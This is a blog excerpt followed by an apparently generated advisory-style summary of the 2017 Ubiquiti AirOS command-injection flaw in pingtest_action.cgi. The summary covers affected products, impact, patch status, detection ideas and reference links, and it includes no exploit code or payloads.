Full Report
We actually use Ubiquiti Wi-Fi Gear and have found it pretty good, I didn’t realise their security was so whack and they were using PHP 2.0.1 from 1997! In this case a malicious URL can inject commands into a Ubiquiti device which surprise, surprise, runs the web service as root. Apparently, they also got scammed […]
Analysis Summary
As a vulnerability research specialist, here is the summarized, actionable intelligence regarding the reported Ubiquiti flaw:
# Vulnerability: Command Injection via Outdated PHP in Ubiquiti AirOS
## CVE Details
* **CVE ID:** The article does not explicitly list a CVE ID, but describes a critical vulnerability discovered by SEC Consult Vulnerability Lab.
* **CVSS Score:** Not explicitly provided in the text.
* **CWE:** CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) is highly likely.
## Affected Systems
* **Products:** Ubiquiti networking gear utilizing AirOS, specifically mentioned examples include **toughswitch** and **airgateway**. (Note: UniFi, EdgeMAX, and AmpliFi products were later stated to be *not* affected.)
* **Versions:** Vulnerable AirOS versions using **PHP/FI 2.0.1 (from 1997)**. Specific version ranges are not detailed but are expected to be covered in the vendor advisory.
* **Configurations:** Devices running vulnerable AirOS versions accessible via the web interface.
## Vulnerability Description
The flaw resides in the script `pingtest_action.cgi`. This script improperly handles variable input, allowing an attacker to inject arbitrary operating system commands. A critical contributing factor is the use of an extremely outdated PHP version (PHP/FI 2.0.1). Crucially, the web service runs with **root privileges**, elevating the impact of successful exploitation. Furthermore, the application lacks adequate Cross-Site Request Forgery (CSRF) protection, enabling attacks through user interaction (e.g., clicking a malicious link).
## Exploitation
* **Status:** Proof-of-Concept (PoC) exploits were withheld by the researchers due to the lack of a patch at the time of disclosure, but the description strongly implies exploitability.
* **Complexity:** **Low**. The attack requires only a single GET request, often achieved by luring a user to click a crafted link or visit a malicious website, due to the lack of CSRF defense.
* **Attack Vector:** **Network** (via a crafted URL clicked by an authenticated user).
## Impact
Successful exploitation grants an attacker the ability to execute arbitrary code with root privileges on the device, leading to a full takeover of the entire network managed by the device.
* **Confidentiality:** **High** (root access allows retrieval of sensitive configuration and potentially network traffic).
* **Integrity:** **High** (attacker can modify device configurations and network routing).
* **Availability:** **High** (attacker can take the device offline or compromise network availability).
## Remediation
### Patches
* **Patches Available:** Yes. Ubiquiti released patches for the affected AirOS versions on or around March 18, 2017 (as per the update in the article). Users must check the official Ubiquiti community resources for the specific AirOS version update.
### Workarounds
* No specific workarounds were detailed prior to the patch release, but the inherent nature of the attack suggests that restricting access to the device's web interface to only trusted networks might limit remote exploitation risk.
## Detection
* **Indicators of Compromise:** Look for unexpected outbound connections originating from the device (e.g., reverse shells), modifications to device configuration, or unusual network activity routed through the Ubiquiti gateway/router.
* **Detection Methods and Tools:** Monitoring web traffic directed at Ubiquiti devices for URL parameters containing shell metacharacters or commands targeted toward the `pingtest_action.cgi` script. Security auditing tools should be used to verify current software versions against known vulnerable firmware.
## References
* Vendor Advisory URL (Defanged): `community.ubnt.com/t5/airMAX-General-Discussion/AirOS-Vulnerability-Issue-Update-3-18-17/td-p/1869309`
* SEC Consult Advisory URL (Defanged): `sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170316-0_Ubiquiti_Networks_authenticated_command_injection_v10.txt`